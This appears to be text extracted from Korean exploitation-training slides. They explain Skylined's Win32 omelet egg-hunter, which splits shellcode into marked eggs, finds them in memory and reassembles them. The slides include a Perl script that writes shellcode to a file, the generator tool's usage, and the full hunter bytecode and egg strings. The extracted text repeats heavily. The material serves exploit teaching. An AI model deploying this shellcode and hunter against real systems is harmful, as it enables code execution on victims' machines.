What is the Omelet-Egg-Hunter ? 쉘코드 단편화 기술(shellcode fragmentation technique) Skylined(Berend-Jan Wever)에 의해 소개됨 (http://code.google.com/p/w32-seh-omelet-shellcode/) 공격가능한 벡터가 아주 작은 크기의 Buffer 만을 제공하며, 공격자가 제 어 가능한 작은 공간의 여러 메모리 조각뿐일때 유용 기본 개념은 일반적인 Egg-Hunter와 같으나, 아래와 같은 차이점이 존재 최종 쉘코드가 여러 조각으로 나누어진다(여러개의 에그) 최종 쉘코드가 실행되기 전에 재조합 된다(발견된 즉시 실행되지 않음) 일반적인 에그 헌터보다 크기가 더 크다(about 90bytes) Track3. Exploitation Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 오리지널 쉘 코드 단편화 구성 Length of the Egg Index Number 3bytes Marker Fragmented ShellCode (1/n , 2/n, 3/n … n/n) Omelet-Egg-Hunter 코드 메모리 검색 (search through memory) 모든 에그 찾기(look for all egg) 단편화된 쉘코드를 최종 쉘코드로 조립 (reproduces the original shellcode at the bottom of the stack) 조립된 최종 쉘코드로 이동/실행 (jumps to the reproduced shell code and executes it)
Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행
Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Search though memory Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 !
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 " Find Marker
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 # Check length/index
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 # reproduces the original shellcode at the bottom of the stack
Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Search though memory Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 $
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 % Find Marker
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 & Check length/index
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 & reproduces the original shellcode at the bottom of the stack
Track3. Exploitation How to work Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Search though memory Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 '
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 ( Find Marker
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 ) Check length/index
Track3. Exploitation How to work Omelet-Egg-Hunter ? Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41 ) reproduces the original shellcode at the bottom of the stack
Track3. Exploitation How to work Omelet-Egg-Hunter ? Omelet-Egg-Hunter Code 메모리 검색 Marker 찾기 단편화된 쉘코드 조립 최종 쉘코드로 이동 및 실행 Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) Fragmented Shellcode 1/3 Length(32) Index(01) Marker x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 Original Shellcode x89xe2xdaxc1xd9x72xf4x58 x50x59x49x49x49x49x43x43 x43x43x43x43x51x5ax56x54 x58x33x30x56x58x34x41x50 x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x4fx4cx4bx50x4fx42x38x4c Fragmented Shellcode 2/3 Length(32) Index(02) Marker x30x41x33x48x48x30x41x30 x30x41x42x41x41x42x54x41 x41x51x32x41x42x32x42x42 x30x42x42x58x50x38x41x43 x30x41x33x48x48x30x41x30 Fragmented Shellcode 3/3 Length(32) Index(03) Marker x4ax4ax49x4bx4cx4ax48x50 x44x43x30x43x30x45x50x4c x4bx47x35x47x4cx4cx4bx43 x4cx43x35x43x48x45x51x4a x30x41x42x41x41x42x54x41  jumps to the reproduced shellcode and executes it
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming)
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 오믈렛 코드 패키지 다운로드(쉘코드 단편화 및 오믈렛 코드 생성 스크립트) W32-seh-omelet-shellcode (by Skylined) https://code.google.com/p/w32-seh-omelet-shellcode/downloads/list
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드 파일 생성 (makingShellCodeForOmelet.pl) my $scfile="shellcode.bin"; my $shellcode="x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49" . "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" . "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" . "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" . "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a" . "x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47" . "x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c" . "x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a" . "x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50" . "x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43" . "x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a" . "x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c" . "x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44" . "x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c" . "x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47" . "x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50" . "x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44" . "x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43" . "x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42" . "x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b" . "x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45" . "x31x42x4cx42x43x45x50x41x41"; open(FILE,">$scfile"); print FILE $shellcode; close(FILE); print "Wrote ".length($shellcode)." bytes to file ".$scfile."n";
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드를 에그로 변환 하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55 C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py Syntax: w32_SEH_omelet.py "omelet bin file" "shellcode bin file" "output txt file" [egg size] [marker bytes] Where: omelet bin file = The omelet shellcode stage binary code followed by three bytes of the offsets of the "marker bytes", "max index" and "egg size" variables in the code. shellcode bin file = The shellcode binary code you want to have stored in the eggs and reconstructed by the omelet shellcode stage code. output txt file = The file you want the omelet egg-hunt code and the eggs to be written to (in text format). egg size = The size of each egg (legal values: 6-127, default: 127) marker bytes = The value you want to use as a marker to distinguish the eggs from other data in user-land address space (legal values: 0-0xFFFFFF, default value: 0x280876) Convert the shell code to eggs C:Documents and SettingseduDesktopexamplesTrack33EggHuntingToolsForEggHun tingw32 SEH omelet shellcode v0>w32_SEH_omelet.py w32_SEH_omelet.bin shellcode. bin calceggs.txt 127 0xBADA55
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드를 에그로 변환 하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55 // This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes: omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0C x59xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5A xE8xC7xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDBx31xC0x64xFFx50x08"; // These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode // (you can insert them as many times as you want, as long as each one is // inserted at least once). They are 127 bytes each: egg0 = "x7AxFFx55xDAxBAx89xE2xDAxC1xD9x72xF4x58x50x59x49x49x49x49x43x43x43x43x43x43x51x5A x56x54x58x33x30x56x58x34x41x50x30x41x33x48x48x30x41x30x30x41x42x41x41x42x54x41x41x51x32x41x4 2x32x42x42x30x42x42x58x50x38x41x43x4Ax4Ax49x4Bx4Cx4Ax48x50x44x43x30x43x30x45x50x4Cx4B x47x35x47x4Cx4Cx4Bx43x4Cx43x35x43x48x45x51x4Ax4Fx4Cx4Bx50x4Fx42x38x4Cx4Bx51x4F x47x50x43x31x4Ax4Bx51x59x4Cx4Bx46x54x4Cx4Bx43"; egg1 = "x7AxFEx55xDAxBAx31x4Ax4Ex50x31x49x50x4Cx59x4Ex4Cx4Cx44x49x50x43x44x43x37x49x51x49x5A x44x4Dx43x31x49x52x4Ax4Bx4Ax54x47x4Bx51x44x46x44x43x34x42x55x4Bx55x4Cx4Bx51x4F x51x34x45x51x4Ax4Bx42x46x4Cx4Bx44x4Cx50x4Bx4Cx4Bx51x4Fx45x4Cx45x51x4Ax4Bx4Cx4Bx45x4Cx4Cx4B x45x51x4Ax4Bx4Dx59x51x4Cx47x54x43x34x48x43x51x4Fx46x51x4Bx46x43x50x50x56x45x34x4Cx4B x47x36x50x30x4Cx4Bx51x50x44x4Cx4Cx4Bx44x30x45"; egg2 = "x7AxFDx55xDAxBAx4Cx4Ex4Dx4Cx4Bx45x38x43x38x4Bx39x4Ax58x4Cx43x49x50x42x4A x50x50x42x48x4Cx30x4Dx5Ax43x34x51x4Fx45x38x4Ax38x4Bx4Ex4Dx5Ax44x4Ex46x37x4Bx4Fx4D x37x42x43x45x31x42x4C x42x43x45x50x41x41x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x4 0x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x40x 40x40x40x40x40x40x40x40";
Track3. Exploitation How to made Omelet-Egg-Hunter ? Introduction Track3-1 Win32 Overwrite RET Overwrite SEH Egg-Hunting ROOriePn( tRede turn Programming) Heap Spray Track3-2 *NIX Overwrite RET Ret-to-LibC Overwrite .dtors Overwrite GOT Track3-3 ARM Overwrite RET Ret-to-LibC ROOriePn t(Rede turn Programming) 쉘코드를 에그로 변환 하나의 에그에 담을 수 있는 쉘 코드의 최대 크기는 127 bytes Marker = 0xBADA55 omelet_code // This is the binary code that needs to be executed to find the eggs, // recombine the orignal shellcode and execute it. It is 82 bytes: omelet_code = "x31xFFxEBx23x51x64x89x20xFCxB0x7AxF2xAEx50x89xFExADx35xFFx55xDAxBAx83xF8x03x77x0C x59xF7xE9x64x03x42x08x97xF3xA4x89xF7x31xC0x64x8Bx08x89xCCx59x81xF9xFFxFFxFFxFFx75xF5x5A xE8xC7xFFxFFxFFx61x8Dx66x18x58x66x0DxFFx0Fx40x78x03x97xEBxDBx31xC0x64xFFx50x08"; // These are the eggs that need to be injected into the target process // for the omelet shellcode to be able to recreate the original shellcode // (you can insert them as many times as you want, as long as each one is // 